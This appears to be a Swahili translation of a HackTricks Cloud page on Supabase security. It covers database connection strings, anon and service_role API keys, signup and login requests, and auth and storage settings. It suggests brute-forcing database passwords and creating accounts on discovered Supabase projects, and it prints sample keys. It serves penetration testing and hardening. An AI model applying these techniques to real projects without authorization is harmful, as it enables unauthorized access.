Supabase Security

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mipango ya usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

Taarifa za Msingi

Kulingana na ukurasa wao wa kutua: Supabase ni mbadala wa Firebase wa chanzo wazi. Anza mradi wako na hifadhidata ya Postgres, Uthibitishaji, APIs za papo hapo, Edge Functions, Usajili wa Wakati Halisi, Hifadhi, na Vector embeddings.

Subdomain

Kimsingi wakati mradi unaundwa, mtumiaji atapokea subdomain ya supabase.co kama: jnanozjdybtpqgcwhdiz.supabase.co

Usanidi wa Hifadhidata

Taarifa hizi zinaweza kupatikana kutoka kiungo kama https://supabase.com/dashboard/project/<project-id>/settings/database

Hii hifadhidata itapelekwa katika baadhi ya maeneo ya AWS, na ili kuungana nayo itakuwa inawezekana kufanya hivyo kwa kuunganisha na: postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres (hii iliundwa katika us-west-1). Nenosiri ni nenosiri ambalo mtumiaji aliweka hapo awali.

Kwa hivyo, kwa kuwa subdomain inajulikana na inatumika kama jina la mtumiaji na maeneo ya AWS ni machache, inaweza kuwa inawezekana kujaribu brute force nenosiri.

Sehemu hii pia ina chaguzi za:

Weka upya nenosiri la hifadhidata
Sanidi connection pooling
Sanidi SSL: Kataa miunganisho ya maandishi wazi (kwa chaguo-msingi zimewezeshwa)
Sanidi ukubwa wa Disk
Tumia vizuizi na marufuku za mtandao

Usanidi wa API

Taarifa hizi zinaweza kupatikana kutoka kiungo kama https://supabase.com/dashboard/project/<project-id>/settings/api

URL ya kufikia API ya supabase katika mradi wako itakuwa kama: https://jnanozjdybtpqgcwhdiz.supabase.co.

anon api keys

Pia itazalisha anon API key (role: "anon"), kama: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk ambayo programu itahitaji kutumia ili kuwasiliana na API key iliyofichuliwa katika mfano wetu

Inawezekana kupata API REST ya kuwasiliana na API hii katika docs, lakini endpoints za kuvutia zaidi zitakuwa:

Signup (/auth/v1/signup)

``` POST /auth/v1/signup HTTP/2 Host: id.io.net Content-Length: 90 X-Client-Info: supabase-js-web/2.39.2 Sec-Ch-Ua: "Not-A.Brand";v="99", "Chromium";v="124" Sec-Ch-Ua-Mobile: ?0 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36 Content-Type: application/json;charset=UTF-8 Apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk Sec-Ch-Ua-Platform: "macOS" Accept: */* Origin: https://cloud.io.net Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://cloud.io.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Priority: u=1, i

{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}

</details>

<details>

<summary>Login (/auth/v1/token?grant_type=password)</summary>

POST /auth/v1/token?grant_type=password HTTP/2 Host: hypzbtgspjkludjcnjxl.supabase.co Content-Length: 80 X-Client-Info: supabase-js-web/2.39.2 Sec-Ch-Ua: "Not-A.Brand";v="99", "Chromium";v="124" Sec-Ch-Ua-Mobile: ?0 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36 Content-Type: application/json;charset=UTF-8 Apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk Sec-Ch-Ua-Platform: "macOS" Accept: / Origin: https://cloud.io.net Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://cloud.io.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Priority: u=1, i

{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}

</details>

Kwa hivyo, kila unapogundua mteja anayetumia supabase na subdomain waliyopewa (inawezekana kwamba subdomain ya kampuni ina CNAME juu ya subdomain yao ya supabase), unaweza kujaribu **kuunda akaunti mpya kwenye jukwaa kwa kutumia supabase API**.

### secret / service\_role api keys

Funguo ya siri ya API pia itazalishwa na **`role: "service_role"`**. Funguo hii ya API inapaswa kuwa siri kwa sababu itaweza kupita **Row Level Security**.

Funguo ya API inaonekana kama hii: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`

### JWT Secret

**JWT Secret** pia itazalishwa ili programu iweze **kuunda na kusaini tokeni za JWT maalum**.

## Authentication

### Signups

<div data-gb-custom-block data-tag="hint" data-style='success'>

Kwa **chaguo-msingi** supabase itaruhusu **watumiaji wapya kuunda akaunti** kwenye mradi wako kwa kutumia API endpoints zilizotajwa hapo awali.

</div>

Hata hivyo, akaunti hizi mpya, kwa chaguo-msingi, **zitahitaji kuthibitisha anwani yao ya barua pepe** ili waweze kuingia kwenye akaunti. Inawezekana kuwezesha **"Ruhusu kuingia bila majina"** ili kuruhusu watu kuingia bila kuthibitisha anwani yao ya barua pepe. Hii inaweza kutoa ufikiaji wa **data isiyotarajiwa** (wanapata majukumu `public` na `authenticated`).\
Hii ni wazo mbaya sana kwa sababu supabase inatoza kwa mtumiaji anayefanya kazi hivyo watu wanaweza kuunda watumiaji na kuingia na supabase itatoza kwa wale:

<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>

### Passwords & sessions

Inawezekana kuonyesha urefu wa chini wa nenosiri (kwa chaguo-msingi), mahitaji (hapana kwa chaguo-msingi) na kukataa kutumia nywila zilizovuja.\
Inashauriwa **kuboresha mahitaji kwani yale ya chaguo-msingi ni dhaifu**.

* User Sessions: Inawezekana kusanidi jinsi vikao vya watumiaji vinavyofanya kazi (muda wa kumalizika, kikao 1 kwa mtumiaji...)
* Bot and Abuse Protection: Inawezekana kuwezesha Captcha.

### SMTP Settings

Inawezekana kuweka SMTP kutuma barua pepe.

### Advanced Settings

* Weka muda wa kumalizika kwa tokeni za ufikiaji (3600 kwa chaguo-msingi)
* Weka kugundua na kufuta tokeni za upya zinazoweza kuwa zimeathirika na muda wa kumalizika
* MFA: Onyesha ni vipengele vingapi vya MFA vinaweza kusajiliwa mara moja kwa mtumiaji (10 kwa chaguo-msingi)
* Max Direct Database Connections: Idadi ya juu ya miunganisho inayotumika kwa uthibitisho (10 kwa chaguo-msingi)
* Max Request Duration: Muda wa juu unaoruhusiwa kwa ombi la Uthibitisho kudumu (10s kwa chaguo-msingi)

## Storage

<div data-gb-custom-block data-tag="hint" data-style='success'>

Supabase inaruhusu **kuhifadhi faili** na kuzifanya zipatikane kupitia URL (inatumia S3 buckets).

</div>

* Weka kikomo cha ukubwa wa faili ya kupakia (chaguo-msingi ni 50MB)
* Muunganisho wa S3 unatolewa na URL kama: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
* Inawezekana **kuomba ufunguo wa ufikiaji wa S3** ambao umeundwa na `access key ID` (mfano `a37d96544d82ba90057e0e06131d0a7b`) na `secret access key` (mfano `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)

## Edge Functions

Inawezekana **kuhifadhi siri** katika supabase pia ambazo zitakuwa **zinapatikana na edge functions** (zinaweza kuundwa na kufutwa kutoka kwenye wavuti, lakini haiwezekani kufikia thamani zao moja kwa moja).

<div data-gb-custom-block data-tag="hint" data-style='success'>

Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/image.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Angalia [**mipango ya usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

</div>

PreviousOkta Hardening NextAnsible Tower / AWX / Automation controller Security

Last updated 1 month ago